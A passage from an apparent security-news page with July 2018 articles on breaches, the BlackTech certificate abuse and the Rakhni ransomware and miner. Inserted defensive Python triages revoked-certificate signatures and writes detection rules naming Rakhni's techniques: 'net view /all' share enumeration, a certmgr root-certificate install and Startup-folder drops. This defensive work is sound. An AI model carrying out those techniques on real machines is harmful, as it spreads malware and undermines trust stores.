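    Connection header across lines cannot hide its total content.
    """
    head = raw_request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue                     # not a header line; skip it
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return lines[0], headers


def check_connection_header(raw_request):
    """Return a list of findings for the request; an empty list means no issue."""
    request_line, headers = parse_request(raw_request)
    value = headers.get("connection")
    if value is None:
        return []
    findings = []
    if len(value) > MAX_CONNECTION_LEN:
        findings.append(
            f"Connection header is {len(value)} bytes "
            f"(limit {MAX_CONNECTION_LEN}): {request_line}")
    tokens = [t.strip().lower() for t in value.split(",") if t.strip()]
    unexpected = [t for t in tokens if t not in ALLOWED_TOKENS]
    if unexpected:
        findings.append(
            f"Connection header has unexpected token(s) {unexpected}: {request_line}")
    return findings


if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("suspect", SUSPECT_REQUEST)):
        print(label, check_connection_header(req) or "no findings")
```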
GoDaddy-owned hosting company Domainfactory hacked
11.7.2018 securityaffairs Hacking
The hosting company Domainfactory has taken down its forums after hackers posted messages claiming to have breached its infrastructure.
While I was writing about the Timehop security breach, another incident was making the headlines; the victim is the German hosting company Domainfactory.
The hosting company, which has been owned by GoDaddy since 2016, has taken down its forums after hackers posted messages informing visitors that they had breached the Domainfactory infrastructure.
The company notified customers of the data breach and asked them to change their passwords.
“On July 3, 2018, a person in the DomainFactory forum claimed access to DomainFactory customer data. We initiated a detailed investigation and found that customer data was accessed by an outside party without authorization. The access route is now secured.” wrote a company representative.
“We contact all customers with the recommendation to update their DomainFactory passwords. Instructions for changing your passwords can be found here:
We have notified the data protection authority and commissioned external experts with the investigation. The protection of the data of our customers is paramount and we regret the inconvenience this incident causes, very much.”
The company notified the data protection authorities and is investigating the hack with the help of external experts.
The Domainfactory staff first learned of the incident in the early evening of July 3, 2018; the security team dated the breach itself to January 28, 2018.
A first investigation confirmed that unauthorized third parties could have had access to several categories of data, including customer name, company name, customer number, address, e-mail addresses, phone number, DomainFactory phone password, date of birth, bank name and account number (e.g. IBAN or BIC), and Schufa score.
In response to the attack, the company secured the breached systems.
The hack was disclosed by the German media outlet Heise, which noticed the strange messages posted by the hackers on the forums.
The German journalist Fabian Scherschel also posted on Twitter (in German), before public disclosure of the incident, that he had noticed a thread “in which lots of #Domainfactory customers ask a hacker about their data because DF does not respond to their requests.”
Fabian A. Scherschel
I’m sitting here in a Twitter thread in which lots of #Domainfactory customers are asking a hacker for their data because DF isn’t responding to their requests. Is this already #PostDSGVO? 😅
According to Heise, the hackers exploited a variant of the Dirty Cow flaw to breach the systems.
Polar fitness app broadcasted sensitive data of intelligence and military personnel
11.7.2018 securityaffairs BigBrothers
The mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel.
A new privacy incident involves a fitness application and the military: this time the mobile fitness app Polar has suspended its location tracking feature due to the leakage of sensitive data on military and intelligence personnel from 69 countries.
This is the second such incident in a few months: in January, experts discovered that military personnel worldwide had publicly shared their exercise routes recorded through the fitness tracker Strava, revealing fitness sessions conducted inside or near military bases.
During the weekend, Dutch security experts revealed that they were able to find data on some 6,000 individuals, including military personnel from dozens of countries and FBI and National Security Agency personnel.
According to an investigation by the news website Bellingcat and the Dutch news outlet De Correspondent, the fitness devices were leaking data belonging to military or intelligence officials that could be exploited by threat actors to spy on them.
“With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning,” explained the security researcher Foeke Postma, who investigated the case with the Dutch news outlet De Correspondent.
“We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer’s identity.”
The experts discovered detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea.
The exposure of such data poses serious risks to the military personnel as reported in a post published by Defensenews.com.
“Bellingcat was able to pinpoint the name of a “high-ranking officer” at a base known to host nuclear weapons. It took just a few clicks. Using the Polar Flow app and other information found on the internet, De Correspondent was able to collect a disturbing amount of one Dutch soldier’s personal information.” reads the blog post published by Defensenews.com.
“They found the name of the soldier, the fact he was stationed at one of the key locations where the war against the Islamic State is being waged from, the soldier’s home address, and the names of his wife and kids.”
In response to the privacy incident, Polar has disabled the feature that allowed users to share data and pointed out that any data made public was the result of users who opted in to location tracking.
The company has already implemented a number of measures to mitigate the exposure of its users along with the suspension for the Flow Explore feature until further notice.
The location tracking feature allows thousands of athletes all over the world to share data related to their training sessions every day.
“If there hasn’t been a data breach, why have you suspended the Explore feature? While the decision to opt-in and share training sessions and GPS location data is the choice and responsibility of the customer, we are aware that potentially sensitive locations were appearing in public data, and have made the decision to suspend the Explore until further notice.” reads the statement published by Polar.
“I have seen statements that suggest that Polar leaked data – Did Polar leak any data? Contrary to what has been reported—it’s important to clarify that Polar has not leaked any data. Furthermore, there has been no breach of private data.”
The De Correspondent investigation revealed that only about two percent of Polar users chose to share their data, yet journalists and experts were still able to collect sensitive data on military and civilian personnel.
“We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea,” states the De Correspondent report.
BlackTech APT using stolen D-Link certificates to spread malware
11.7.2018 securityaffairs APT
A cyber-espionage group tracked as BlackTech is abusing code-signing certificates stolen from D-Link for the distribution of their malware.
Security experts from ESET discovered that an APT group tracked as BlackTech is using code-signing certificates stolen from the Taiwan-based tech firm D-Link and the security company Changing Information Technology Inc.
According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.
The attackers used the certificates to sign the code of the Plead backdoor that has been in the wild since at least 2012.
The Plead backdoor was used by threat actors to exfiltrate confidential documents from Taiwanese government agencies and private organizations.
“We spotted this malware campaign when our systems marked several files as suspicious. Interestingly, the flagged files were digitally signed using a valid D-Link Corporation code-signing certificate.” reads the analysis published by ESET.
“The exact same certificate had been used to sign non-malicious D-Link software; therefore, the certificate was likely stolen.”
ESET reported the abuse to D-Link, which revoked the two certificates on July 3 and told its customers that most of them should not be affected by the revocation.
“D-Link recently discovered that two of its code signing certificates were misappropriated. Upon discovery, we immediately decommissioned the certificates and investigated the issue.” reads the advisory published by D-Link.
“Like several other companies in Asia, D-Link was victimized by a highly active cyber espionage group which has been using PLEAD Malware to steal confidential information from companies and organizations based in East Asia, particularly in Taiwan, Japan, and Hong Kong. The two affected D-Link certificates were revoked, effective July 3rd, 2018. New certificates have been issued to resolve this problem.”
Taiwan-based Changing Information Technology Inc. revoked the abused certificate on July 4, but according to ESET the attackers kept using it to sign and spread malware. Revocation only helps verifiers that actually check it: a control that merely confirms a file is signed and chains to a trusted root keeps accepting such files, and signatures timestamped before the revocation date continue to validate unless the CA backdates the revocation to the compromise date.
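Why continued use of a stolen certificate keeps working after revocation, as an added example (not ESET, D-Link or BlackTech tooling): the triage below classifies signed files from an inventory against revocation data the way Authenticode chain validation does, then keys the hunt on the certificate serial rather than on the validity verdict. Only the 2018-07-03 revocation date is taken from D-Link's advisory; the serial numbers, hashes, signing times and the inventory itself are constructed.

```python
"""Triage of signed binaries against a stolen, later revoked, code-signing
certificate, as in the D-Link case above.

Added example, not ESET or D-Link tooling. The serial numbers, hashes,
signing times and the inventory are constructed; only the 2018-07-03
revocation date comes from D-Link's advisory.
"""
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional

UTC = timezone.utc


@dataclass(frozen=True)
class SignedBinary:
    sha256: str                     # file hash (constructed, shortened)
    signer: str                     # subject CN of the leaf certificate
    serial: str                     # leaf certificate serial (constructed)
    signed_at: Optional[datetime]   # time from the timestamp countersignature, None if absent


# What a CRL carries: serial -> effective revocation date.
REVOKED = {"0d1c6fb223419a8e": datetime(2018, 7, 3, tzinfo=UTC)}


def classify(binary, revoked=REVOKED):
    """How Authenticode chain validation treats this signature.

    With a timestamp countersignature, Windows checks the certificate as
    of the signing time. A revocation whose effective date is later than
    that time does not invalidate the signature, unless the CA backdates
    the revocation to the compromise date. Without a timestamp the chain
    is checked at verification time, so the revocation applies."""
    revoked_on = revoked.get(binary.serial)
    if revoked_on is None:
        return "not_revoked"
    if binary.signed_at is None:
        return "revoked_untimestamped"
    if binary.signed_at >= revoked_on:
        return "signed_after_revocation"
    return "timestamped_before_revocation"


def hunt(inventory, revoked=REVOKED):
    """Every binary signed with a revoked certificate, whatever the chain says."""
    return [b for b in inventory if b.serial in revoked]


def triage(inventory, known_good, revoked=REVOKED):
    """Map each hunted hash to (verdict, classification). Only a hash match
    against the vendor's own releases clears a file; a 'valid signature'
    does not, because the attacker's files validate exactly like the vendor's."""
    result = {}
    for b in hunt(inventory, revoked):
        verdict = "allow" if b.sha256 in known_good else "investigate"
        result[b.sha256] = (verdict, classify(b, revoked))
    return result


# Constructed inventory: the same stolen certificate on a real vendor utility
# and on three malicious samples, plus an unrelated signed file.
INVENTORY = [
    SignedBinary("a1f3", "D-Link Corporation", "0d1c6fb223419a8e", datetime(2017, 11, 2, tzinfo=UTC)),
    SignedBinary("b7c9", "D-Link Corporation", "0d1c6fb223419a8e", datetime(2018, 6, 20, tzinfo=UTC)),
    SignedBinary("c44e", "D-Link Corporation", "0d1c6fb223419a8e", datetime(2018, 7, 9, tzinfo=UTC)),
    SignedBinary("d902", "D-Link Corporation", "0d1c6fb223419a8e", None),
    SignedBinary("e5a0", "Example Vendor Ltd", "7a55c01e9b3d4f12", datetime(2018, 5, 1, tzinfo=UTC)),
]
KNOWN_GOOD = {"a1f3"}   # hashes published by the vendor (constructed)

if __name__ == "__main__":
    for sha, (verdict, cls) in triage(INVENTORY, KNOWN_GOOD).items():
        print(sha, verdict, cls)
```

The point of the output is that `a1f3` (the vendor's real utility) and `b7c9` (a sample signed by the thieves before July 3) get the identical classification: chain validation cannot tell them apart, so the hunt has to start from the serial and end with a hash allowlist.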
ESET identified two malware families abusing the stolen certificates: the Plead backdoor and a related password stealer component that collects saved passwords from Google Chrome, Microsoft Internet Explorer, Microsoft Outlook, and Mozilla Firefox.
The signed Plead samples are heavily obfuscated with junk code. Each one either downloads from a remote server, or opens from the local disk, a small encrypted binary blob; the blob holds encrypted shellcode that downloads the final Plead backdoor module.
Why do the attackers steal digital certificates?
Attackers sign malicious code with stolen certificates so that the malware looks like a legitimate application and slips past security controls that trust signed binaries.
The best-known case of malware abusing code-signing certificates is the Stuxnet worm, which used certificates stolen from Realtek and JMicron.
Just using a $39 device it is possible to defeat new iOS USB Restricted Mode
11.7.2018 securityaffairs Apple
Once USB Restricted Mode engages, no data communication takes place over the Lightning port, but researchers have found a way to reset the countdown timer that triggers it.
Apple recently released iOS 11.4.1, which introduced a new security feature, USB Restricted Mode, designed to protect devices against the USB accessories that forensics firms and law enforcement agencies use to extract data from iPhones and iPads.
USB Restricted Mode first appeared in the iOS betas; it disables the data connection of the Lightning port one hour after the device was last unlocked, while charging continues to work.
Forensic hardware such as the devices sold by Cellebrite and Grayshift can then no longer attempt passcode brute-force attacks over the Lightning port.
While Apple proudly announced its new feature, experts from ElcomSoft have found a way to reset the countdown timer of USB Restricted Mode and bypass the defense mechanism.
The researchers found that connecting a USB accessory to the device within an hour of its last unlock resets the one-hour countdown.
Apple's own $39 Lightning to USB 3 Camera Adapter is enough to do it; the experts also found that untrusted Lightning accessories, ones that have never been paired with the iPhone, reset the timer as well.
“What we discovered is that iOS will reset the USB Restrictive Mode countdown timer even if one connects the iPhone to an untrusted USB accessory, one that has never been paired to the iPhone before (well, in fact the accessories do not require pairing at all).” reads the post published by ElcomSoft.
“In other words, once the police officer seizes an iPhone, he or she would need to immediately connect that iPhone to a compatible USB accessory to prevent USB Restricted Mode lock after one hour. Importantly, this only helps if the iPhone has still not entered USB Restricted Mode.”
ElcomSoft researchers are also testing cheap unofficial Lightning to USB adapters to see whether they reset the timer too.
According to the experts, the issue is probably nothing more than an oversight that Apple could easily fix.
USB Restricted Mode is enabled from Settings > Face ID (or Touch ID) & Passcode > USB Accessories by leaving the toggle off.
To engage the protection immediately, before the countdown expires, press the Power button five times.
Adobe July Patch Tuesday fixes over 100 flaws in Adobe Acrobat and Reader
11.7.2018 securityaffairs Vulnerebility
Adobe released July Patch Tuesday security updates that address over 100 flaws in Acrobat and Reader, and other issues in Flash Player, Experience Manager, and Connect.
On Tuesday Adobe released its July security updates, which address more than 100 flaws in its products: 105 vulnerabilities in Acrobat and Reader, two in Flash Player, three in Experience Manager, and three in Connect.
The Windows and macOS versions of Adobe Acrobat and Reader were affected by dozens of critical memory corruption bugs that an attacker could exploit for remote code execution. The list includes double-free, heap overflow, use-after-free, out-of-bounds write, type confusion, untrusted pointer dereference, and buffer error vulnerabilities.
“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.
The July updates also address a critical privilege escalation flaw and dozens of important out-of-bounds read vulnerabilities.
Many flaws fixed by Adobe were reported to the company through the Trend Micro’s Zero-Day Initiative (ZDI).
“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player 30.0.0.113 and earlier versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the advisory published by Adobe for Flash Player.
Adobe also addressed three server-side request forgery (SSRF) vulnerabilities in Experience Manager that can lead to the exposure of sensitive information, and fixed authentication bypass and insecure library loading flaws in Adobe Connect. None of the Experience Manager and Connect flaws is rated critical.
The good news for Adobe customers is that the company is not aware of any in-the-wild attacks exploiting the flaws addressed by the July updates.
Trojan Either Encrypts Files or Mines for Cryptocurrency
7.7.2018 securityweek Cryptocurrency
A long-established ransomware family recently added the ability to deploy a cryptocurrency miner instead of a file encryptor, depending on the victim machine’s configuration.
The malware, which Kaspersky Lab detects as Rakhni, was first discovered in 2013 and has received numerous updates ever since. The latest feature added to the threat, however, makes it stand out from the crowd: the malware’s downloader checks the victim system and decides whether to infect it with a cryptor or a miner.
Mainly affecting users in Russia but spread worldwide, the Trojan is being distributed via spam emails with a malicious Word document attached. The file has an embedded PDF document that, once opened, launches a malicious downloader and also displays a fake error message to the victim.
The malware poses as software from Adobe, and even uses a fake digital signature featuring the name Adobe Systems Incorporated.
Once executed, it performs a series of checks to determine if it runs in a virtualized environment or if it is being analyzed, creates a registry key, and checks the process count, computer name, and IP address. The downloader also checks registry keys for specific strings associated with virtual machines, sandbox and analysis tools.
After completing this exhaustive list of checks (over 200), the threat proceeds to install a root certificate from its resources. The malware also checks for anti-virus programs on the system and can disable Windows Defender if no other AV process is found.
The downloader checks if the folder %AppData%\Bitcoin is present on the machine and drops the cryptor if it exists. If not, and there are more than two logical processors, the miner is dropped. If the folder doesn’t exist and there’s only one logical processor, the malware jumps to a worm component.
The cryptor performs its own set of checks on the machine, targets over 60 processes for termination, and only starts encrypting if the system has been idle for 2 minutes. The malware targets nearly 200 file types for encryption, uses the RSA-1024 encryption algorithm, and appends the .neitrino extension to the affected files.
The miner generates a VBS script that gets launched after the system reboots, and which contains two commands to mine for Monero and Monero Original, respectively. Then, if the installation directory also contains the svchost.exe file, the malware launches it to mine for Dashcoin. A fake Microsoft certificate is used to hide the malicious process on the system.
“When this analysis was carried out, the downloader was receiving an archive with a miner that didn’t use the GPU. The attacker uses the console version of the MinerGate utility for mining,” Kaspersky explains.
The malware was also observed sending emails to a hardcoded address, providing the attackers with information such as computer name, IP address, the malware’s path on the system, date and time, and malware build date, in addition to details on the infection itself.
The downloader was also observed attempting to spread to other computers on the local network. For that, it gets a list of network shares and then checks each computer to see if the folder Users is shared, in an attempt to copy itself to the Startup folder of each accessible user.
The malware also creates a batch file to delete all ‘temporary’ files used during infection, a rather common behavior.
Google July 2018 Android patches fix critical vulnerabilities
7.7.2018 securityaffairs Android
This week Google released the July 2018 Android patches that address tens of vulnerabilities in the popular mobile operating system.
Google released the July 2018 Android patches, which address a total of 11 vulnerabilities, including three Critical issues and eight High-severity flaws in the Framework, Media framework, and System components.
The Critical vulnerabilities are remote code execution issues; the remaining flaws include information disclosure, denial of service, and elevation of privilege bugs.
The most severe vulnerability affecting the Framework (CVE-2018-9433) could be exploited by a remote attacker using a specially crafted pac file to execute arbitrary code within the context of a privileged process.
“The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” reads the security advisory.
The most severe vulnerability in the System component (CVE-2018-9365) could be exploited by a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.
The most severe vulnerability in the Media framework component (CVE-2018-9411) could be exploited by a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.
Affected Android versions are Android 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, and 8.1.
Google also addressed a total of 32 vulnerabilities as part of the 2018-07-05 security patch level, 8 critical issues and 24 rated as High risk.
These vulnerabilities affect the Kernel (4 elevation of privilege bugs), Qualcomm components (6 flaws: 1 Critical remote code execution flaw, 1 High-severity remote code execution flaw, 2 High-severity information disclosure issues, and 2 elevation of privilege vulnerabilities), and Qualcomm closed-source components (22 flaws: 7 Critical and 15 High-severity).
New Rakhni variant could infect systems with either a ransomware or a miner
7.7.2018 securityaffairs Ransomware
Security researchers at Kaspersky Lab have discovered a new strain of the Rakhni malware that infects systems with either ransomware or a cryptocurrency miner.
Experts from Kaspersky Lab have discovered a new strain of the Rakhni ransomware family that delivers either ransomware or a cryptocurrency miner, depending on the configuration of the infected machine.
“Way back in 2013 our malware analysts spotted the first malicious samples related to the Trojan-Ransom.Win32.Rakhni family.” reads the analysis published by Kaspersky.
“Now the criminals have decided to add a new feature to their creation – a mining capability. In this article we describe a downloader that decides how to infect the victim: with a cryptor or with a miner.”
The Rakhni malware is spread via spear-phishing messages carrying a weaponized Word document as an attachment.
When the victim opens the document, it prompts them to save it and enable editing. The document contains a PDF icon; clicking it launches a malicious executable, which immediately displays a fake error message box.
The message informs the victim that it is impossible to open the PDF file because a system file is missing.
In the background, the Rakhni downloader runs anti-VM and anti-sandbox checks to determine whether it is safe to infect the system. If so, it performs further checks to decide whether to deliver ransomware or a cryptocurrency miner.
“The decision to download the cryptor or the miner depends on the presence of the folder %AppData%\Bitcoin. If the folder exists, the downloader decides to download the cryptor.” continues the analysis.
“If the folder doesn’t exist and the machine has more than two logical processors, the miner will be downloaded. If there’s no folder and just one logical processor, the downloader jumps to its worm component, which is described below in the corresponding part of the article.”
If the target system has a ‘Bitcoin’ folder under AppData, the downloader fetches the cryptor. The cryptor first terminates all processes that match a predefined list of popular applications, then encrypts files using the RSA-1024 algorithm, and finally displays a ransom note in a text file.
If the ‘Bitcoin’ folder doesn’t exist and the machine has more than two logical processors the malware drops the MinerGate utility to mine Monero (XMR), Monero Original (XMO) and Dashcoin (DSH) cryptocurrencies in the background.
Kaspersky also noticed that this variant of the downloader installs a root certificate stored in its resources, and every executable it downloads is signed with that certificate. The researchers found fake certificates claiming to have been issued by Microsoft Corporation and Adobe Systems Incorporated, installed through the CertMgr.exe utility in an attempt to make the miner look like a trusted process.
If the infected system doesn’t have a ‘Bitcoin’ folder and has only a single logical processor, the malware activates the worm component that allows the malicious code to spread among all the computers in the local network using shared resources.
“As one of its last actions the downloader tries to copy itself to all the computers in the local network. To do so, it calls the system command ‘net view /all’ which will return all the shares and then the Trojan creates the list.log file containing the names of computers with shared resources” the researchers report.
“For each computer listed in the file the Trojan checks if the folder Users is shared and, if so, the malware copies itself to the folder \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup of each accessible user.”
The experts also noticed that the malware implements spyware capabilities.
Most of the infections are in Russia (95.5%), other systems infected with the malware are in Kazakhstan (1.36%), Ukraine (0.57%), Germany (0.49%), and India (0.41%) as well.
Further details including the IoCs are reported in the analysis published by Kaspersky.
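Both Kaspersky write-ups on this page (the SecurityWeek piece above and this one) describe the same observable side effects: CertMgr.exe installing a fake root certificate, the worm enumerating shares with `net view /all`, the list.log it writes, and copies dropped into other users' Startup folders over SMB. The following detection logic is an added example, not Kaspersky's code: it runs those four checks over a constructed Sysmon-like event stream (EventID 1 for process creation, 11 for file creation). Host names, paths and users are made up, and the CertMgr.exe command line assumes the tool's standard `-add ... -s -r localMachine root` syntax, since the article does not give the exact arguments.

```python
"""Host-based detection of the Rakhni downloader's side effects described in
the two Kaspersky write-ups above: root certificate installation through
certmgr.exe, share enumeration with `net view /all`, the list.log it writes,
and executables dropped into other users' Startup folders over SMB.

Added example, not Kaspersky's code. The events are a constructed,
Sysmon-like stream (EventID 1 = process creation, 11 = file creation); the
host names, paths and user names are made up.
"""
import re
from collections import defaultdict

STARTUP_DROP = re.compile(
    r"\\Users\\[^\\]+\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.(exe|vbs|bat|cmd)$",
    re.IGNORECASE,
)
# Processes that legitimately write to Startup folders (the user's shell, installers).
STARTUP_WRITERS_ALLOWED = {"explorer.exe", "msiexec.exe"}


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_certmgr_root_install(ev):
    """certmgr.exe adding a certificate to the machine Root store."""
    if ev["EventID"] != 1 or image_name(ev["Image"]) != "certmgr.exe":
        return False
    cmd = ev["CommandLine"].lower()
    return "-add" in cmd and " root" in cmd


def rule_net_view_all(ev):
    """Share enumeration the worm component runs before copying itself."""
    return (ev["EventID"] == 1
            and image_name(ev["Image"]) in ("net.exe", "net1.exe")
            and re.search(r"\bview\s+/all\b", ev["CommandLine"], re.I) is not None)


def rule_list_log(ev):
    """list.log written by a process running out of a user's temp directory."""
    return (ev["EventID"] == 11
            and ev["TargetFilename"].lower().endswith("\\list.log")
            and "\\appdata\\local\\temp\\" in ev["Image"].lower())


def rule_startup_exe_drop(ev):
    """Executable created in a Startup folder by something other than the
    user's shell or an installer. Files written over SMB from another host
    are attributed to Image 'System', which is exactly the worm's way in."""
    return (ev["EventID"] == 11
            and STARTUP_DROP.search(ev["TargetFilename"]) is not None
            and image_name(ev["Image"]) not in STARTUP_WRITERS_ALLOWED)


RULES = {
    "certmgr_root_install": rule_certmgr_root_install,
    "net_view_all": rule_net_view_all,
    "list_log": rule_list_log,
    "startup_exe_drop": rule_startup_exe_drop,
}


def detect(events):
    """Return {host: {"rules": set_of_rule_names, "level": "medium" | "high"}}.
    Any single rule is worth a look; two or more on one host is the chain."""
    hits = defaultdict(set)
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits[ev["host"]].add(name)
    return {h: {"rules": r, "level": "high" if len(r) > 1 else "medium"}
            for h, r in hits.items()}


# Constructed event stream (not real telemetry)
EVENTS = [
    {"host": "WS01", "EventID": 1, "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net  view /all"},
    {"host": "WS01", "EventID": 1, "Image": r"C:\Windows\System32\certmgr.exe",
     "CommandLine": r"certmgr.exe -add C:\Users\alice\AppData\Local\Temp\ms.cer -s -r localMachine root"},
    {"host": "WS01", "EventID": 11, "Image": r"C:\Users\alice\AppData\Local\Temp\updater.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\list.log"},
    {"host": "FS02", "EventID": 11, "Image": "System",
     "TargetFilename": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\taskhost.exe"},
    {"host": "WS03", "EventID": 1, "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": r"net use Z: \\fs02\share"},
    {"host": "WS03", "EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\carol\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notes.lnk"},
]

if __name__ == "__main__":
    for host, result in detect(EVENTS).items():
        print(host, result["level"], sorted(result["rules"]))
```

In the sample stream the infected workstation trips three rules and the file server that received a copy over SMB trips one; the workstation mapping a drive with `net use` and the user who drops a shortcut into their own Startup folder through Explorer produce nothing, which is the false-positive budget these rules aim for.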
Ex-NSO Employee Accused of Stealing Spyware Source Code
6.7.2018 securityweek Virus
A former employee of Israel-based cyber arms dealer NSO Group has been accused of stealing spyware source code from the company and attempting to sell it for $50 million, Israel’s Justice Ministry announced this week.
The suspect has not been named, but court documents reveal that he’s a 38-year-old from Netanya hired by NSO as a senior programmer in the company's automation team.
According to prosecutors, NSO informs employees that they are prohibited from copying any software from work devices, a rule that is enforced using a McAfee product that can prevent external storage units from being connected to computers.
Investigators claim that the suspect searched the Web for ways to bypass the security product, methods which he used to copy both NSO software and its source code following a poor performance review from his manager.
The suspect then allegedly searched the Internet for potential buyers of the spyware. He is said to have attempted to sell the files for $50 million in cryptocurrency on the dark web, but his potential buyer alerted NSO, which led to the employee’s dismissal and arrest. Investigators found the stolen files on an external drive hidden under a mattress in the suspect’s home.
Court documents show that the suspect told the potential buyer that he was a hacker who had broken into NSO’s systems.
Authorities allege that the defendant’s actions could have harmed state security and could have led to NSO’s collapse. However, the firm told Israeli media that the stolen files were not shared with a third party.
NSO Group, a company owned by US private equity firm Francisco Partners Management, is best known for Pegasus and Chrysaor, tools designed for spying on iOS and Android phones, respectively.
In 2016, Apple released an emergency patch for iOS after researchers discovered that Pegasus had been exploiting three zero-day vulnerabilities in the mobile operating system.
NSO claims to sell its tools only to governments to help them in their fight against terrorists and criminals. However, Pegasus has apparently been abused in some cases, including in Mexico, where the government was accused last year of using it to spy on journalists and activists.
According to recent reports, Verint Systems is in talks to acquire NSO for roughly $1 billion.
Vietnam Activists Flock to 'Safe' Social Media After Cyber Crackdown
6.7.2018 securityweek Social
Tens of thousands of Vietnamese social media users are flocking to a self-professed free speech platform to avoid tough internet controls in a new cybersecurity law, activists told AFP.
The draconian law requires internet companies to scrub critical content and hand over user data if Vietnam's Communist government demands it.
The bill, which is due to take effect from January 1, sparked outcry from activists, who say it is a chokehold on free speech in a country where there is no independent press and where Facebook is a crucial lifeline for bloggers.
The world's leading social media site has 53 million users in Vietnam, a country of 93 million.
Many activists are now turning to Minds, a US-based open-source platform, fearing Facebook could be complying with the new rules.
"We want to keep our independent voice and we also want to make a point to Facebook that we're not going to accept any censorship," Tran Vi, editor of activist site The Vietnamese, which is blocked in Vietnam, told AFP from Taiwan.
Some activists say they migrated to Minds after content removal and abuse from pro-government Facebook users.
Two editors' Facebook accounts were temporarily blocked and The Vietnamese Facebook page can no longer use the "instant article" tool to post stories.
Nguyen Chi Tuyen, an activist better known by his online handle Anh Chi, says he has moved to Minds as a secure alternative, though he will continue using Facebook and Twitter.
"It's more anonymous and a secretive platform," he said of Minds.
He has previously had to hand over personal details to Facebook to verify his identity and now fears that information could be used against him.
- 'Scary' law -
About 100,000 new active users have registered in Vietnam in less than a week, many posting on politics and current affairs, Minds founder and CEO Bill Ottman told AFP.
"This new cybersecurity law is scaring a lot of people for good reason," he said from Connecticut.
"It's certainly scary to think that you could not only be censored but have your private conversations given to a government that you don't know what they're going to use that for."
The surge of new users from Vietnam now accounts for nearly 10 percent of Minds' total user base of about 1.1 million.
Users are not required to register with personal data and all chats are encrypted.
Vietnam's government last year announced a 10,000-strong cybersecurity army tasked with monitoring incendiary material online.
In its unabashed defence of the new law, Vietnam has said it is aimed at protecting the regime and avoiding a "colour revolution", but refused to comment to AFP on Thursday.
Facebook told AFP it is reviewing the law and says it considers government requests to take down information in line with its Community Standards -- and pushes back when possible.
Google declined to comment on the new law when asked by AFP, but its latest Transparency Report showed that it had received 67 separate requests from the Vietnamese government to remove more than 6,500 items since 2009, the majority since early last year.
Most were taken down, though Google does not provide precise data on content removal compliance.
Ottman says countries like Vietnam are fighting a losing battle trying to control online expression.
"It's like burning books, it just causes more attention to be brought to those issues and it further radicalises those users because they're so upset that they're getting censored," he said.
Chinese hackers breached systems at Australian National University … and are still there
6.7.2018 securityaffairs BigBrothers
Chinese hackers breached the systems of the Australian National University (ANU) and, according to the experts, they are still there.
Chinese hackers continue to target organizations worldwide; this time attackers based in China breached the systems of the Australian National University (ANU), one of the most prestigious universities in the country.
The bad news is that experts are still working to lock the intruders out, because the attackers remain active in the university's network.
“The ABC has been told the Australian National University (ANU) system was first compromised last year.” reported the ABC news.
The ANU had been working with intelligence agencies for several months to contain the threat and minimize its impact.
“The university has been working in partnership with Australian government agencies for several months to minimise the impact of this threat, and we continue to seek and take advice from Australian government agencies,” reads the official statement published by the Australian National University.
“Current assessments indicate no staff, student or research information has been taken and counter-measures are being undertaken.”
The Cyber Security Minister Angus Taylor pointed out that the Australian Government “condemns any malicious activity” that targets the systems of the country.
“We know that nation states and criminal groups actively target research and tertiary institutions to steal the intellectual property of hardworking Australians,” he said.
“Malicious cyber activity against Australia’s national interests, whether from criminal syndicates or foreign states, is increasing in frequency, sophistication and severity, and the Australian Government’s highest priority is ensuring Australians are safe and our interests are secure.”
Mr Taylor confirmed that the Australian Cyber Security Centre (ACSC) had been supporting ANU in this case.
“The Australian Cyber Security Centre works closely with any affected organisations to reduce the likelihood of threat actors being successful and to help them recover when they are compromised,” he said.
Australian systems are a frequent target. In October 2016 a report published by the Australian Cyber Security Centre confirmed that the Australian Bureau of Meteorology hack was the work of foreign cyber spies.
In December 2015 the Australian Broadcasting Corporation (ABC) revealed that a supercomputer operated by the Australian Bureau of Meteorology (BoM) had been hit by a cyber attack. The Bureau of Meteorology is Australia’s national weather, climate, and water agency, the counterpart of the US National Weather Service.
The BoM supercomputer targeted by the hackers also provides weather data to defence agencies, so access to it could give a persistent attacker a significant advantage for numerous reasons.
Initial media reports blamed China for that attack. In 2013, Chinese hackers had been accused by the authorities of stealing the top-secret plans and documents of Australia’s new intelligence agency headquarters.
Hamas cyber-operatives lure Israeli soldiers to spyware hidden in tainted apps
6.7.2018 securityaffairs BigBrothers
